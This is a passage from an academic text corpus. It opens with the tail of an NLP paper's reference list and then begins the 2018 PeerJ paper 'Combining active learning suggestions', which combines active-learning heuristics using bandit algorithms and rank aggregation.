89(1). Dolan, B., Quirk, C., and Brockett, C. (2004). Un- supervised construction of large paraphrase cor- pora: Exploiting massively parallel news sources. In Proceedings of the 20th International Confer- ence on Computational Linguistics (COLING). Dolan, W. and Brockett, C. (2005). Automatically constructing a corpus of sentential paraphrases. In Proceedings of the 3rd International Workshop on Paraphrasing. Dunning, T. (1993). Accurate methods for the statis- tics of surprise and coincidence. Computational Linguistics, 19(1). Fellbaum, C. (2010). WordNet. In Theory and Ap- plications of Ontology: Computer Applications. Springer. Francis, W. N. and Kucera, H. (1979). Brown corpus manual. Brown University. Fung, P. and Cheung, P. (2004a). Mining very-non- parallel corpora: Parallel sentence and lexicon ex- traction via bootstrapping and EM. In Proceed- ings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Fung, P. and Cheung, P. (2004b). Multi-level boot- strapping for extracting parallel sentences from a quasi-comparable corpus. In Proceedings of the International Conference on Computational Lin- guistics (COLING). Guo, W. and Diab, M. (2012). Modeling sentences in the latent space. In Proceedings of the 50th Annual Meeting of the Association for Computa- tional Linguistics (ACL). Guo, W., Li, H., Ji, H., and Diab, M. (2013). Link- ing tweets to news: A framework to enrich short text data in social media. In Proceedings of the 51th Annual Meeting of the Association for Com- putational Linguistics (ACL). Han, B., Cook, P., and Baldwin, T. (2012). Auto- matically constructing a normalisation dictionary for microblogs. In Proceedings of the Confer- ence on Empirical Methods on Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL). Hinton, G. E. (2002). Training products of experts by minimizing contrastive divergence. Neural Computation, 14(8). Hoffmann, R., Zhang, C., Ling, X., Zettlemoyer, L. S., and Weld, D. S. (2011). Knowledge-based weak supervision for information extraction of overlapping relations. In Proceedings of the 49th Annual Meeting of the Association for Computa- tional Linguistics (ACL). Hovy, E., Marcus, M., Palmer, M., Ramshaw, L., and Weischedel, R. (2006). OntoNotes: the 90% solution. In Proceedings of the Human Language Technology Conference - North American Chap- ter of the Association for Computational Linguis- tics Annual Meeting (HLT-NAACL). Ji, Y. and Eisenstein, J. (2013). Discriminative improvements to distributional sentence similar- ity. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing (EMNLP). Liang, P., Bouchard-Côté, A., Klein, D., and Taskar, B. (2006). An end-to-end discriminative approach to machine translation. In Proceedings of the 21st International Conference on Computational Lin- guistics and the 44th annual meeting of the Asso- ciation for Computational Linguistics (COLING- ACL). Ling, W., Marujo, L., Dyer, C., Alan, B., and Isabel, T. (2014). Crowdsourcing high-quality parallel data extraction from Twitter. In Proceedings of the Ninth Workshop on Statistical Machine Trans- lation (WMT). MacCartney, B., Galley, M., and Manning, C. (2008). A phrase-based alignment model for natural language inference. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Madnani, N. and Dorr, B. J. (2010). Generating phrasal and sentential paraphrases: A survey of data-driven methods. Computational Linguistics, 36(3). Madnani, N., Tetreault, J., and Chodorow, M. (2012). Re-examining machine translation met- rics for paraphrase identification. In Proceedings of the Conference of the North American Chapter of the Association for Computational Linguistics - Human Language Technologies (NAACL-HLT). Minnen, G., Carroll, J., and Pearce, D. (2001). Ap- plied morphological processing of english. Natu- ral Language Engineering, 7(03). Moore, R. C. (2004). On log-likelihood-ratios and the significance of rare events. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Nenkova, A. and Vanderwende, L. (2005). The im- pact of frequency on summarization. Technical report, Microsoft Research. MSR-TR-2005-101. O’Connor, B., Krieger, M., and Ahn, D. (2010). Tweetmotif: Exploratory search and topic sum- marization for Twitter. In Proceedings of the 4th International AAAI Conference on Weblogs and Social Media (ICWSM). Petrović, S., Osborne, M., and Lavrenko, V. (2012). Using paraphrases for improving first story detec- tion in news and Twitter. In Proceedings of the Conference of the North American Chapter of the Association for Computational Linguistics - Hu- man Language Technologies (NAACL-HLT). Riedel, S., Yao, L., and McCallum, A. (2010). Mod- eling relations and their mentions without labeled text. In Proceedigns of the European Conference on Machine Learning and Principles and Practice of Knowledge Discovery in Databases (ECML- PKDD). Ritter, A., Mausam, Etzioni, O., and Clark, S. (2012). Open domain event extraction from Twit- ter. In Proceedings of the 18th International Con- ference on Knowledge Discovery and Data Min- ing (SIGKDD). Ritter, A., Zettlemoyer, L., Mausam, and Etzioni, O. (2013). Modeling missing data in distant super- vision for information extraction. Transactions of the Association for Computational Linguistics (TACL). Robbins, H. (1985). Some aspects of the sequen- tial design of experiments. In Herbert Robbins Selected Papers. Springer. Sekine, S. (2005). Automatic paraphrase discovery based on context and keywords between NE pairs. In Proceedings of the 3rd International Workshop on Paraphrasing. Shinyama, Y., Sekine, S., and Sudo, K. (2002). Au- tomatic paraphrase acquisition from news articles. In Proceedings of the 2nd International Confer- ence on Human Language Technology Research (HLT). Surdeanu, M., Tibshirani, J., Nallapati, R., and Man- ning, C. D. (2012). Multi-instance multi-label learning for relation extraction. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics (ACL). Thadani, K. and McKeown, K. (2011). Optimal and syntactically-informed decoding for monolingual phrase-based alignment. In Proceedings of the 49th Annual Meeting of the Association for Com- putational Linguistics - Human Language Tech- nologies (ACL-HLT). Tran-Thanh, L., Stein, S., Rogers, A., and Jennings, N. R. (2012). Efficient crowdsourcing of un- known experts using multi-armed bandits. In Pro- ceedings of the European Conference on Artificial Intelligence (ECAI). Vanderwende, L., Suzuki, H., Brockett, C., and Nenkova, A. (2007). Beyond SumBasic: Task- focused summarization with sentence simplifica- tion and lexical expansion. Information Process- ing & Management, 43. Wan, S., Dras, M., Dale, R., and Paris, C. (2006). Using dependency-based features to take the “para-farce” out of paraphrase. In Proceedings of the Australasian Language Technology Work- shop. Wang, L., Dyer, C., Black, A. W., and Trancoso, I. (2013). Paraphrasing 4 microblog normaliza- tion. In Proceedings of the Conference on Em- pirical Methods on Natural Language Processing (EMNLP). Winkler, W. E. (1999). The state of record link- age and current research problems. Technical re- port, Statistical Research Division, U.S. Census Bureau. Xu, W., Hoffmann, R., Zhao, L., and Grishman, R. (2013a). Filling knowledge base gaps for distant supervision of relation extraction. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL). Xu, W., Ritter, A., and Grishman, R. (2013b). Gath- ering and generating paraphrases from Twitter with application to normalization. In Proceed- ings of the Sixth Workshop on Building and Using Comparable Corpora (BUCC). Yao, X., Van Durme, B., Callison-Burch, C., and Clark, P. (2013a). A lightweight and high perfor- mance monolingual word aligner. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics (ACL). Yao, X., Van Durme, B., and Clark, P. (2013b). Semi-markov phrase-based monolingual align- ment. In Proceedings of the Conference on Em- pirical Methods on Natural Language Processing (EMNLP). Zanzotto, F. M., Pennacchiotti, M., and Tsiout- siouliklis, K. (2011). Linguistic redundancy in Twitter. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing (EMNLP). Zettlemoyer, L. S. and Collins, M. (2007). On- line learning of relaxed CCG grammars for pars- ing to logical form. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natu- ral Language Processing and Computational Nat- ural Language Learning (EMNLP-CoNLL). Zhang, C. and Weld, D. S. (2013). Harvesting paral- lel news streams to generate paraphrases of event relations. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing (EMNLP). work_n3xwttbopngatcfdmiu7tbqtxu ---- Combining active learning suggestions Combining active learning suggestions Alasdair Tran1,2, Cheng Soon Ong1,3 and Christian Wolf 4,5 1 Research School of Computer Science, Australian National University, Canberra, ACT, Australia 2 Data to Decisions Cooperative Research Centre, Adelaide, SA, Australia 3 Machine Learning Research Group, Data61, CSIRO, Canberra, ACT, Australia 4 Research School of Astronomy and Astrophysics, Australian National University, Canberra, ACT, Australia 5 ARC Centre of Excellence for All-sky Astrophysics (CAASTRO), Sydney, NSW, Australia ABSTRACT We study the problem of combining active learning suggestions to identify informative training examples by empirically comparing methods on benchmark datasets. Many active learning heuristics for classification problems have been proposed to help us pick which instance to annotate next. But what is the optimal heuristic for a particular source of data? Motivated by the success of methods that combine predictors, we combine active learners with bandit algorithms and rank aggregation methods. We demonstrate that a combination of active learners outperforms passive learning in large benchmark datasets and removes the need to pick a particular active learner a priori. We discuss challenges to finding good rewards for bandit approaches and show that rank aggregation performs well. Subjects Data Mining and Machine Learning Keywords Active learning, Bandit, Rank aggregation, Benchmark, Multiclass classification INTRODUCTION Recent advances in sensors and scientific instruments have led to an increasing use of machine learning techniques to manage the data deluge. Supervised learning has become a widely used paradigm in many big data applications. This relies on building a training set of labeled examples, which is time-consuming as it requires manual annotation from human experts. The most common approach to producing a training set is passive learning, where we randomly select an instance from a large pool of unlabeled data to annotate, and we continue doing this until the training set reaches a certain size or until the classifier makes sufficiently good predictions. Depending on how the underlying data is distributed, this process can be quite inefficient. Alternatively we can exploit the current set of labeled data to identify more informative unlabeled examples to annotate. For instance we can pick examples near the decision boundary of the classifier, where the class probability estimates are uncertain (i.e., we are still unsure which class the example belongs to). Many active learning heuristics have been developed to reduce the labeling bottleneck without sacrificing the classifier performance. These heuristics actively choose the most informative examples to be labeled based on the predicted class probabilities. “Overview of Active Learning” describes two families of algorithms in detail: uncertainty sampling and version space reduction. In this paper, we present a survey of how we can combine suggestions from various active learning heuristics. In supervised learning, combining predictors is a well-studied How to cite this article Tran et al. (2018), Combining active learning suggestions. PeerJ Comput. Sci. 4:e157; DOI 10.7717/peerj-cs.157 Submitted 5 January 2018 Accepted 14 June 2018 Published 23 July 2018 Corresponding author Alasdair Tran, alasdair.tran@anu.edu.au Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.157 Copyright 2018 Tran et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.157 mailto:alasdair.�tran@�anu.�edu.�au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.157 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ problem. Many techniques such as AdaBoost (Freund & Schapire, 1996) (which averages predictions from a set of models) and decision trees (Breiman et al., 1984) (which select one model for making predictions in each region of the input space) have been shown to perform better than just using a single model. Inspired by this success, we propose to combine active learning suggestions with bandit and rank aggregation methods in “Combining Suggestions.” The use of bandit algorithms to combine active learners has been studied before (Baram, El-Yaniv & Luz, 2004; Hsu & Lin, 2015). Borda count, a simple rank aggregation method, has been used in the context of multi-task learning for linguistic annotations (Reichart et al., 2008), where we have one active learner selecting examples to improve the performance of multiple related tasks (e.g., part-of-speech tagging and name entity recognition). Borda count has also been used in multi-label learning (Reyes, Morell & Ventura, 2018) to combine uncertainty information from multiple labels. As far as we know, other aggregation methods have not been explored and our work is the first time that social choice theory is used to rank and aggregate suggestions from multiple active learners. This paper makes the following two main contributions: 1. We empirically compare four bandit and three rank aggregation algorithms in the context of combining active learning heuristics. We apply these algorithms to 11 benchmark datasets from the UCI Machine Learning Repository (Lichman, 2013) and a large dataset from the Sloan Digital Sky Survey (SDSS) (Alam et al., 2015). The experimental setup and discussion are described in “Experimental Protocol, Results, and Discussion.” 2. We propose two metrics for evaluation: the mean posterior balanced accuracy (MPBA) and the strength of an algorithm. The MPBA extends the metric proposed in Brodersen et al. (2010) from the binary to the multi-class setting. This is an accuracy measure that takes class imbalance into account. The strength measure is a variation on the deficiency measure used in Baram, El-Yaniv & Luz (2004) which evaluates the performance of an active learner or combiner, relative to passive learning. The main difference between our measure and that of Baram, El-Yaniv & Luz (2004) is that ours assigns a higher number for better active learning methods and ensures that it is upper-bounded by 1 for easier comparison across datasets. OVERVIEW OF ACTIVE LEARNING In this paper we consider the binary and multiclass classification settings where we would like to learn a classifier h, which is a function that maps some feature space X � Rd to a probability distribution over a finite label space Y: h : X ! pðYÞ (1) In other words, we require that the classifier produces class probability estimates for each unlabeled example. For instance, in logistic regression with only two classes, i.e., Y ¼f0; 1g, we can model the probability that an object with feature vector x belongs to the positive class with Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 2/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ hðx; θÞ¼ Pðy ¼ 1 jx; θÞ¼ 1 1þ e�θT x (2) and the optimal weight vector θ is learned in training. We can further consider kernel logistic regression, where the feature space X is the feature space corresponding to a given kernel, allowing for non-linear decision functions. In active learning, we use the class probability estimates from a trained classifier to estimate a score of informativeness for each unlabeled example. In pool-based active learning, where we select an object from a pool of unlabeled examples at each time step, we require that some objects have already been labeled. In practice this normally means that we label a small random sample at the beginning. These become the labeled training set LT �X �Y and the rest form the unlabeled set U �X. Now consider the problem of choosing the next example in U for querying. Labeling can be a very expensive task, because it requires using expensive equipment or human experts to manually examine each object. Thus, we want to be smart in choosing the next example. This motivates us to come up with a rule s(x; h) that gives each unlabeled example a score based only on their feature vector x and the current classifier h. Recall that the classifier produces p(Y), a probability estimate for each class. We use these probability estimates from the classifier over the unlabeled examples to calculate the scores: s : pðYÞ! R (3) The value of s(x; h) indicates the informativeness of example x, where bigger is better. We would then label the example with the largest value of s(x; h). This will be our active learning rule r: rðU; hÞ¼ arg max x2U sðx; hÞ (4) Algorithm 1 outlines the standard pool-based active learning setting. Coming up with an optimal rule is itself a difficult problem, but there have been many attempts to derive good heuristics. Five common ones, which we shall use in our experiments, are described in “Uncertainty Sampling” and “Version Space Reduction.” Algorithm 1 The pool-based active learning algorithm. Input: unlabeled set U, labeled training set ℒT, classifier h(x), and active learner rðU; hÞ. repeat Select the most informative candidate x� from U using the active learning rule rðU; hÞ. Ask the expert to label x�. Call the label y�. Add the newly labeled example to the training set: LT LT [fðx�; y�Þg. Remove the newly labeled example from the unlabeled set: U Unfx�g. Retrain the classifier h(x) using ℒT. until we have enough training examples. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 3/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ There are also heuristics that involve minimizing the variance or maximizing the classifier certainty of the model (Schein & Ungar, 2007), but they are computationally expensive. For example, in the variance minimization heuristic, the score of a candidate example is the expected reduction in the model variance if that example were in the training set. To compute this reduction, we first need to give the example each of the possible labels, add it to the training set, and update the classifier. This is expensive to run since in each iteration, the classifier needs to be retrained k �U times, where k is the number of classes and U is the size of the unlabeled pool. There are techniques to speed this up such as using online training or assigning a score to only a small subset of the unlabeled pool. Preliminary experiments showed that these heuristics do not perform as well as the simpler ones (Tran, 2015), so we do not consider them in this paper. A more comprehensive treatment of these active learning heuristics can be found in (Settles, 2012). Uncertainty sampling Lewis & Gale (1994) introduced uncertainty sampling, where we select the instance whose class membership the classifier is least certain about. These tend to be points that are near the decision boundary of the classifier. Perhaps the simplest way to quantify uncertainty is the least confidence heuristic (Culotta & McCallum, 2005), where we pick the candidate whose most likely label the classifier is most uncertain about: rLCðU; hÞ¼ arg max x2U �max y2Y pðy jx; hÞ � � (5) where p(y|x; h) is the probability that the object with feature vector x belongs to class y under classifier h. For consistency, we have flipped the sign of the score function so that the candidate with the highest score is picked. A second option is to calculate the entropy (Shannon, 1948), which measures the amount of information needed to encode a distribution. Intuitively, the closer the class probabilities of an object are to a uniform distribution, the higher its entropy will be. This gives us the heuristic of picking the candidate with the highest entropy of the distribution over the classes: rHEðU; hÞ¼ arg max x2U � X y2Y pðy jx; hÞ log½pðy jx; hÞ� ( ) (6) As a third option we can pick the candidate with the smallest margin, which is defined as the difference between the two highest class probabilities (Scheffer, Decomain & Wrobel, 2001): rSMðU; hÞ¼ arg max x2U � max y2Y pðy jx; hÞ� max z2Ynfy�g pðz jx; hÞ � �� (7) where y� ¼ arg maxy2Y pðz jx; hÞand we again flip the sign of the score function. Since the sum of all probabilities must be 1, the smaller the margin is, the harder it is to differentiate between the two most likely labels. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 4/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ An extension to the above three heuristics is to weight the score with the information density so that we give more importance to instances in regions of high density: sIDðU; hÞ¼ 1 U XE k ¼ 1 simðx; xðkÞÞ ! sðx; hÞ (8) where h is the classifier, s(x; h) is the original score function of the instance with feature vector x, U is the size of the unlabeled pool, and sim(x, x (k) ) is the similarity between x and another instance x (k) using the Gaussian kernel with parameter g: simðx; xðkÞÞ ¼ expðgjjx �xðkÞjj2Þ (9) The information density weighting was proposed by Settles & Craven (2008) to discourage the active learner from picking outliers. Although the class membership of outliers might be uncertain, knowing their labels would probably not affect the classifier performance on the data as a whole. Version space reduction Instead of focusing on the uncertainty of individual predictions, we could instead try to constrain the size of the version space, thus allowing the search for the optimal classifier to be more precise. The version space is defined as the set of all possible classifiers that are consistent with the current training set. To quantify the size of this space, we can train a committee of B classifiers, B = {h1, h2, ..., hB}, and measure the disagreement among the members of the committee about an object’s class membership. Ideally, each member should be as different from the others as possible but still be in the version space (Melville & Mooney, 2004). In order to have this diversity, we give each member only a subset of the training examples. Since there might not be enough training data, we need to use bootstrapping and select samples with replacement. Hence this method is often called Query by Bagging (QBB). One way to measure the level of disagreement is to calculate the margin using the class probabilities estimated by the committee (Melville & Mooney, 2004): rQBBMðU; hÞ¼ arg max x2U � max y2Y pðy jx;BÞ� max z2Ynfy�g pðz jx;BÞ � �� (10) where y� ¼ arg max y2Y pðz jx;BÞ (11) pðz jx;BÞ¼ 1 B X b2B pðy jx; hbÞ (12) This looks similar to one of the uncertainty sampling heuristics, except now we use p(y|x; B) instead of p(y|x; h). That is, we first average out the class probabilities predicted by the members before minimizing the margin. McCallum & Nigam (1998) offered an alternative disagreement measure which involves picking Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 5/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ the candidate with the largest mean Kullback–Leibler (KL) divergence from the average: rQBBKLðU; hÞ ¼ arg max x2U 1 B XB b ¼ 1 DKLðpb k pBÞ ( ) (13) where DKL(pb‖pB) is the KL divergence from pB (the probability distribution that is averaged across the committee B), to pb (the distribution predicted by a member b ∈ B): DKLðpb k pBÞ¼ X y2Y pðy jx; hbÞ ln pðy jx; hbÞ pðy jx;BÞ (14) For convenience, we summarize the five heuristics discussed above in Table 1. COMBINING SUGGESTIONS Out of the five heuristics discussed, which one should we use in practice when we would like to apply active learning to a particular problem? There have been some attempts in the literature to do a theoretical analysis of their performance. Proofs are however scarce, and when there is one available, they normally only work under restrictive assumptions. For example, Freund et al. (1997) showed that the query by committee algorithm (a slight variant of our two QBB heuristics) guarantees an exponential decrease in the prediction error with the training size, but only when there is no noise. In general, whether any of these heuristics is guaranteed to beat passive learning is still an open question. Even though we do not know which one is the best, we can still combine suggestions from all of the heuristics. This can be thought of as the problem of prediction with expert advice, where each expert is an active learning heuristic. In this paper we explore two different approaches: we can either consider the advice of only one expert at each time step (with bandit algorithms), or we can aggregate the advice of all the experts (with social choice theory). Combining suggestions with bandit theory First let us turn our attention to the multi-armed bandit problem in probability theory (Berry & Fristedt, 1985). The colorful name originates from the situation where a gambler Table 1 Summary of active learning heuristics used in our experiments. Abbreviation Heuristic Objective function CONFIDENCE Least confidence arg max x2U �maxy2Y pðyjx; hÞ � � ENTROPY Highest entropy arg max x2U � �Py2Y pðyjx; hÞ log½pðyjx; hÞ�� MARGIN Smallest margin arg max x2U � maxy2Y pðyjx; hÞ�maxz2Ynfy�g pðzjx; hÞ � � � QBB-MARGIN Smallest QBB margin arg max x2U � maxy2Y pðyjx;BÞ�maxz2Ynfy�g pðzjx;BÞ � � � QBB-KL Largest QBB KL arg max x2U � 1 B PB b¼1 DKLðpb k pBÞ � Note: Notations: p(y|x; h) is the probability of that an object with feature vector x has label y under classifier h,B is the set ofB classifiers {h1, h2, : : : , hB}, Y is the set of possible labels, y� is the most certain label, U is the set of unlabeled instances, DKL(p||q) is the Kullback–Leibler divergence of p from q, and pB is the class distribution averaged across classifiers in B. For consistency, with heuristics that use minimization, we flip the sign of the score so that we can always take the argmax to get the best candidate. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 6/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ stands in front of a slot machine with R levers. When pulled, each lever gives out a reward according to some unknown distribution. The goal of the game is to come up with a strategy that can maximize the gambler’s lifetime rewards. In the context of active learning, each lever is a heuristic with a different ability to identify the candidate whose labeling information is most valuable. The main problem in multi-armed bandits is the trade-off between exploring random heuristics and exploiting the best heuristic so far. There are many situations in which we find our previously held beliefs to be completely wrong. By always exploiting, we could miss out on the best heuristic. On the other hand, if we explore too much, it could take us a long time to reach the desired accuracy. Bandit algorithms do not need to know the internal workings of the heuristics, but only the reward received from using any of them. At each time step, we receive a reward from a heuristic, and based on the history of all the rewards, the bandit algorithm can decide on which heuristic to pick next. Formally, we need to learn the function b : ðJR �½0; 1�Þn ! JR (15) where b is the bandit algorithm, the reward is normalized between 0 and 1, Jℛ is the index set over the set of heuristics ℛ, and n is the time horizon. What would be an appropriate reward w in this setting? We propose using the incremental increase in the performance of the test set after the candidate is added to the training set. This, of course, means that we need to keep a separate labeled test set around, just for the purpose of computing the rewards. We could, as is common practice in machine learning, use cross validation or bootstrap on ℒT to estimate the generalization performance. However for simplicity of presentation we use a separate test set ℒS. Figure 1 and Algorithm 2 outline how bandits can be used in pool-based active learning. The only difference between the bandit algorithms lies in the SELECT function that selects which heuristic to use, and the UPDATE function that updates the algorithm’s selection parameters when receiving a new reward. Train with classifier h Assign scores with s Select candidate with highest score Label candidateAdd to training pool Select heuristic with b chosen heuristic r LT p(Y) x∗(x∗, y∗) LS U reward w R Figure 1 Active learning pipeline with bandit algorithms. We need to collect rewards w from the test set ℒS in order to decide which heuristic to choose at each time step. This routine is indicated by the red arrows. Notations: ℛ is the set of heuristics {r1, : : : , rR}, ℒT is the training set, ℒS is the test set, U is the unlabeled set, and p(Y) is the predicted class probabilities on the unlabeled data U. Full-size DOI: 10.7717/peerj-cs.157/fig-1 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 7/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-1 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ There have been some attempts to combine active learning suggestions in the literature. Baram, El-Yaniv & Luz (2004) used the EXP4 multi-armed bandit algorithm to automate the selection process. They proposed a reward called the classification entropy maximization, which can be shown to grow at a similar rate to the true accuracy in binary classification with support vector machines (SVMs). We will not compare our results directly with those in Baram, El-Yaniv & Luz (2004) since we would like to evaluate algorithms that can work with both binary and multi-class classification. Our experiments also use logistic regression which produces probability estimates directly, rather than SVMs which can only produce unnormalized scores. Hsu & Lin (2015) studied an improved version of EXP4, called EXP4.P, and used importance weighting to estimate the true classifier performance using only the training set. In this paper, we empirically compare the following four bandit algorithms: Thompson sampling, OC- UCB, kl-UCB, and EXP3++. Thompson sampling The oldest bandit algorithm is Thompson sampling (Thompson, 1933) which solves the exploration-exploitation trade-off from a Bayesian perspective. Let Wi be the reward of heuristic ri ∈ ℛ. Observe that even with the best heuristic, we still might not score perfectly due to having a poor classifier trained on finite data. Conversely, a bad heuristic might be able to pick an informative candidate due to pure luck. Thus there is always a certain level of randomness in the reward received. Let us treat the reward Wi as a normally distributed random variable with mean νi and variance t2i : ðWi j�iÞ �Nð�i; t2i Þ (16) If we knew both νi and ti 2 for all heuristics, the problem would become trivially easy since we just need to always use the heuristic that has the highest mean Algorithm 2 Pool-based active learning with bandit theory. Note that in addition to the set of active learning heuristics ℛ and the test set ℒS, some bandit algorithms also need to know n, the maximum size of the training set, in advance. Input: unlabeled set U, labeled training set ℒT, labeled test set ℒS, classifier h, desired training size n, set of active learning heuristics ℛ, and bandit algorithm b with two functions SELECT and UPDATE. while jℒTj < n do Select a heuristic r� ∈ ℛ according to SELECT. Select the most informative candidate x� from U using the chosen heuristic r� (U; h). Ask the expert to label x�. Call the label y�. Add the newly labeled example to the training set: LT LT [fðx�; y�Þg. Remove the newly labeled example from the unlabeled set: U Unfx�g. Retrain the classifier h(x) using ℒT. Run the updated classifier on the test set ℒS to compute the increase in the performance w. Update the parameters of b with UPDATE(w). end Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 8/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ reward. In practice, we do not know the true mean of the reward νi, so let us add a second layer of randomness and assume that the mean itself follows a normal distribution: �i �Nðmi; s2iÞ (17) To make the problem tractable, let us assume that the variance ti 2 in the first layer is a known constant. The goal now is to find a good algorithm that can estimate mi and si 2 . We start with a prior on mi and si 2 for each heuristic ri. The choice of prior does not usually matter in the long run. Since initially we do not have any information about the performance of each heuristic, the appropriate prior value for mi is 0, i.e., there is no evidence (yet) that any of the heuristics offers an improvement to the performance. In each round, we draw a random sample νi′ from the normal distribution Nðmi; s2iÞ for each i and select heuristic r� that has the highest sampled value of the mean reward: r� ¼ arg max i v0i (18) We then use this heuristic to select the object that is deemed to be the most informative, add it to the training set, and retrain the classifier. Next we use the updated classifier to predict the labels of objects in the test set. Let w be the reward observed. We now have a new piece of information that we can use to update our prior belief about the mean m� and the variance s� 2 of the mean reward. Using Bayes’ theorem, we can show that the posterior distribution of the mean reward remains normal, ð�� j W� ¼ wÞ�Nðm0�; s0� 2Þ (19) with the following new mean and variance: m0� ¼ m�t 2 � þws2� s2� þt2� s02� ¼ s2�t 2 � s2� þt2� (20) Algorithm 3 summarizes the SELECTand UPDATE functions used in Thompson sampling. Upper confidence bounds Next we consider the Upper Confidence Bound (UCB) algorithms which use the principle of “optimism in the face of uncertainty.” In choosing which heuristic to use, we first estimate the upper bound of the reward (that is, we make an optimistic guess) and pick Algorithm 3 Thompson sampling with normally distributed rewards. Notations: ℛ is the set of R heuristics, m is the mean parameter of the average reward, s 2 is the variance parameter of the average reward, t 2 is the known variance parameter of the reward, and w is the actual reward received. function SELECT() for i ∈ {1, 2, ..., R} do νi′ draw a sample from Nðmi; s2i Þ end Select the heuristic with the highest sampled value: r� argmax i �0i function UPDATE(w) m� m�t 2 � þws2� s2� þt2� s2� s2�t 2 � s2� þt2� Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 9/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ the one with the highest bound. If our guess turns out to be wrong, the upper bound of the chosen heuristic will decrease, making it less likely to get selected in the next iteration. There are many different algorithms in the UCB family, e.g., UCB1-TUNED & UCB2 (Auer, Cesa-Bianchi & Fischer, 2002a), V-UCB (Audibert, Munos & Szepesvári, 2009), OC-UCB (Lattimore, 2015), and kl-UCB (Cappé et al., 2013). They differ only in the way the upper bound is calculated. In this paper, we only consider the last two. In Optimally Confident UCB (OC-UCB), Lattimore (2015) suggests that we pick the heuristic that maximizes the following upper bound: r� ¼ arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi a TiðtÞ ln cn t � �s ! (21) where wi is the average of the rewards from ri that we have observed so far, t is the time step, Ti(t) is the number times we have selected heuristic ri before step t, and n is the maximum number of steps that we are going to take. There are two tunable parameters, a and c, which the author suggests setting to 3 and 2, respectively. In kl-UCB, Cappé et al. (2013) suggest that we can instead consider the KL-divergence between the distribution of the current estimated reward and that of the upper bound. In the case of normally distributed rewards with known variance s 2 , the chosen heuristic would be r� ¼ arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 2s2 lnðTiðtÞÞ t r ! (22) Algorithms 4 and 5 summarize these two UCB approaches. Note that the size of the reward w is not used in UPDATE (w) of UCB, except to select the best arm. Algorithm 4 Optimally Confident UCB. Notations: n is the time horizon (maximum number of time steps), t is the current time step, Ti(t) counts how many times heuristic i has been selected before step t, w is the reward received, and wi is the average of the rewards from ri so far. fuction SELECT() r� arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 3 TiðtÞ ln � 2n t �r function UPDATE(w) t t þ1 T�ðtÞ T�ðt �1Þþ1 Algorithm 5 kl-UCB with normally distributed rewards. Notations: s 2 is the variance of the rewards, t is the current time step, Ti(t) counts how many times heuristic i has been selected before step t, w is the reward received, and wi is the average of the rewards from ri so far. function SELECT() r� arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 2s2 lnðTiðtÞÞ t r function UPDATE(w) t t þ1 T�ðtÞ T�ðt �1Þþ1 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 10/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ EXP3++ The exponential-weight algorithm for exploration and exploitation (EXP3) was first developed by Auer et al. (2002b) to solve the non-stochastic bandit problem where we make no statistical assumptions about the reward distribution. This is also often known as the adversarial setting, where we have an adversary who generates an arbitrary sequence of rewards for each heuristic in advance. Like Thompson sampling, the algorithm samples from a probability distribution at each step to pick a heuristic. Here however, we construct the distribution with exponential weighting (hence the name EXP3). We shall test Seldin & Slivkins (2014)’s EXP3++ algorithm (see Algorithm 6). This is a generalization of the original EXP3 and it has been shown to perform well in both the stochastic (where the reward of each heuristic follows an unknown reward distribution) and the adversarial regime. Combining suggestions with social choice theory A drawback of the above bandit methods is that at each iteration, we could only use one suggestion from one particular heuristic. EXP4 and EXP4.P algorithms can take advice from all heuristics by maintaining a weight on each of them. However, being a bandit method, they require designing a reward scheme. If the reward is the performance on a test set, we would need to keep around a separate subset of the data, which is expensive and sometimes impossible to obtain in practice. This leads us to social choice theory, which can combine suggestions like EXP4 and EXP4.P, while not needing the concept of a reward. Originally developed by political scientists like Nicolas de Condorcet and Jean-Charles de Borda, this field of study is concerned with how we 